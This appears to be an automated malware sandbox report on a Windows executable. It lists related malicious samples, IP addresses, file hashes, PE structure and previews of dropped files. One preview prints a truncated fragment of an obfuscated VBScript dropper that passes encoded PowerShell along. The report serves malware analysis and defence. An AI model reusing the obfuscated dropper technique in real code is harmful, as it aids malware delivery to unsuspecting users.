pz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                • 15.222.112.179
                                                                                                armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 52.210.103.96
                                                                                                1.elfGet hashmaliciousUnknownBrowse
                                                                                                • 54.239.141.187
                                                                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.251.190.135
                                                                                                armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 35.162.240.3
                                                                                                armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.217.242.144
                                                                                                ub8ehJSePAfc9FYqZIT6.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                • 54.171.230.55
                                                                                                ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 34.249.145.219
                                                                                                http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                • 3.124.71.130
                                                                                                nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                • 18.244.18.122
                                                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\OneDrive\autoit3.exe | nj230708full.pdf.scr.exe | malicious | AsyncRAT, AveMaria, StormKitty, VenomRAT
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | Amadey, LummaC Stealer, XWorm
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | LummaC, XWorm
C:\Users\user\OneDrive\autoit3.exe | juwXcVX5AK.exe | malicious | Unknown
C:\Users\user\OneDrive\autoit3.exe | qBtDOzhQnS.exe | malicious | Unknown
C:\Users\user\OneDrive\autoit3.exe | ufp4rvU3SP.exe | malicious | Unknown
C:\Users\user\OneDrive\autoit3.exe | igCCUqSW2T.exe | malicious | Unknown
C:\Users\user\OneDrive\autoit3.exe | juwXcVX5AK.exe | malicious | Unknown
C:\Users\user\OneDrive\autoit3.exe | qBtDOzhQnS.exe | malicious | Unknown
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):841
                                                                                                                    Entropy (8bit):5.351831766340675
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoIvEE4xDqE4j:MxHKlYHKh3oPtHo6wvEHxDqHj
                                                                                                                    MD5:98DCC730A3C77DCDCA7CD8717EB5D42A
                                                                                                                    SHA1:639509210C17EB73F5DB581FA8CA46B1157D8806
                                                                                                                    SHA-256:E3C80885BCC7FE4F349EFB0470D261E0DE273EE26D47AF09C79F1B4B2F891E49
                                                                                                                    SHA-512:7D11C53167839D428DAE35BF759C73FC0C7C49F2DE35CC99E4F8B69CDD40DFBEEF6D355F15FAB1EED62A64AF94E7BA311C0F8E07C3DA6F3A63410CC3E9882B78
                                                                                                                    Malicious:false
                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):61147
                                                                                                                    Entropy (8bit):5.077943793919534
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                    MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                    SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                    SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                    SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                    Malicious:false
                                                                                                                    Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Nlllulx51ll/h:NllU
                                                                                                                    MD5:4293FEE5C8B10DA4F196BB8D3E9677AB
                                                                                                                    SHA1:24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
                                                                                                                    SHA-256:95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
                                                                                                                    SHA-512:262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e................................. ..............@..........
                                                                                                                    Process:C:\Users\user\Desktop\3lhrJ4X.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16256
                                                                                                                    Entropy (8bit):5.435162749518033
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:jgJu1/I96U7azaDq29mtOMG0Yv8mjVgbJXYmEEc7NF9Wu0MDxpnO/9bzgf4L:jTu9ZJp9oE07JX2v10MFpWXgf8
                                                                                                                    MD5:905C384C7A571BEEE31BB5BF89D28638
                                                                                                                    SHA1:B5F709E7666089150BF5101AC11C9F545AF4705E
                                                                                                                    SHA-256:81388FA07AF5A65C4C18F548FEFDB686A33F111040A3D1B2B4DF8B3B5157A483
                                                                                                                    SHA-512:F2BD7CCC879EC6002D4A22D218C8199025F6DCE1D812C01E7FA330A0A127C8470B3AD4926A8215B49EE5BC142325D38267C4CFF7759BE24B2BA364DCDF6C21B7
                                                                                                                    Malicious:true
                                                                                                                    Preview: 'g..iknAFcFdbmo = rRegisggfgdsadfkjhgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$Y")..Call Ugsfisging("QBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB")..kbgmhrkI = TimeSerial(8,9,7)..Public Const gAkcIrk = "apikkjAp"..iecapao = "hffhfg" & LenB("fkhkpjkjm") & "hfg"..'SpdmmSip IApohepgr..jFkekbI = TimeSerial(8,7,8)..Public Const kkaIgcaof = "mmmgbcj"..'njedAoh pFbidkI..Call Ugsfisging("0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o")..Call Ugsfisging("$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$B")..akgmmrji = TimeSerial(8,8,9)..Public Const ikImbdf = "aamFehFFg"..keepdhpc = "hffhfg" & LenB("dAderbFA") & "hfg"..'Feambkne jFamAmk..cISaknIna = TimeSerial(7,9,7)..Public Const bprdSagSp = "Sgdmjfak"..'cpakkrie jobeAehgi..Call Ugsfisging("v$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Dec 7 08:10:48 2019, mtime=Fri Jan 3 21:20:10 2025, atime=Sat Dec 7 08:10:48 2019, length=262432, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1315
                                                                                                                    Entropy (8bit):4.64372926451286
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:8mdRz6PocfEm8n/OtA7n+gjh+gjF2b1/qyFm:8m3+PhMm8/37zhzFEgyF
                                                                                                                    MD5:7254FA56222BDC20C5C7BDF601C9D99B
                                                                                                                    SHA1:82DF056892E0A7AAC8E2608EB1A20CFC0607F2BE
                                                                                                                    SHA-256:68B71A2B439F3A29710E373CAD7892F0FEB2834F8168AC390D3B1CDE4A016B29
                                                                                                                    SHA-512:26BC5DBE40DD5131AFD18E66AF6BA3021208A2B66BAD2B42E1CBC8D8F23141D18B6841AB40E0F327AF8322D8DA3653639BC003C1AA7F054426269747FA4082AC
                                                                                                                    Malicious:false
                                                                                                                     Preview: [binary .lnk data; readable target path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe]
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Joe Sandbox View:
                                                                                                                     • Filename: nj230708full.pdf.scr.exe, Detection: malicious
                                                                                                                     • Filename: file.exe, Detection: malicious
                                                                                                                     • Filename: file.exe, Detection: malicious
                                                                                                                     • Filename: file.exe, Detection: malicious
                                                                                                                     • Filename: juwXcVX5AK.exe, Detection: malicious
                                                                                                                     • Filename: qBtDOzhQnS.exe, Detection: malicious
                                                                                                                     • Filename: ufp4rvU3SP.exe, Detection: malicious
                                                                                                                     • Filename: igCCUqSW2T.exe, Detection: malicious
                                                                                                                     • Filename: juwXcVX5AK.exe, Detection: malicious
                                                                                                                     • Filename: qBtDOzhQnS.exe, Detection: malicious
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................|..........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):298
                                                                                                                    Entropy (8bit):4.924206445966445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
                                                                                                                    MD5:932782CF70ED00D22C0B08B5027B4E31
                                                                                                                    SHA1:78F460A2155D9E819B8452C281285D7E0A7AC14F
                                                                                                                    SHA-256:F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
                                                                                                                    SHA-512:C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
                                                                                                                    Malicious:false
                                                                                                                    Preview:Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...
                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                    Entropy (8bit):6.853882776393411
                                                                                                                    TrID:
                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:3lhrJ4X.exe
                                                                                                                    File size:163'840 bytes
                                                                                                                    MD5:21b5e69aec540eaace5aa6d588896218
                                                                                                                    SHA1:fcd64b005a42f69bfa94118b0cc92d0ddf06ca29
                                                                                                                    SHA256:fcbd0c268f201e76e18eebce0bbc6b063bc2fda1dcf4511c19fdc1287a73195e
                                                                                                                    SHA512:560e4167d0699f22b71299442ed8051290fcae658e6e8eb1b46752239a9dc88c6ea8990a0fb43bb5db99d5afba65939788581c48e92e049fb704437c46d3126a
                                                                                                                    SSDEEP:3072:PahKyd2n31J5GWp1icKAArDZz4N9GhbkrNEk1BDxT:PahOlp0yN90QEi1
                                                                                                                    TLSH:DDF38D4A63E420A6E4BA57B199F203935A31BCB15B7486FF12C4D57E1E336C0A632F17
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                                                                                    Icon Hash:3b6120282c4c5a1f
                                                                                                                    Entrypoint:0x140008200
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x140000000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:10
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:10
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:10
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1cf6c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1d000 | 0x1d000 | ddf742af30579b8e4e407c8dcd40d0db | False | 0.741278286637931 | data | 7.050560118301305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x19ce | Microsoft Cabinet archive data, Windows 2000/XP setup, 6606 bytes, 1 file, at 0x2c +A "67784c48226c6.vbs", ID 1163, number 1, 1 datablock, 0x1503 compression | English | United States | 1.001665152891311
RT_RCDATA | 0x2b240 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b244 | 0x24 | GLS_BINARY_LSB_FIRST | English | United States | 0.6388888888888888
RT_RCDATA | 0x2b268 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b270 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b278 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b27c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b284 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b288 | 0x1d | ASCII text, with no line terminators | English | United States | 1.2758620689655173
RT_RCDATA | 0x2b2a8 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b2ac | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b2b0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b2b8 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2b2c0 | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2b37c | 0x408 | data | English | United States | 0.42151162790697677
RT_MANIFEST | 0x2b784 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906

DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
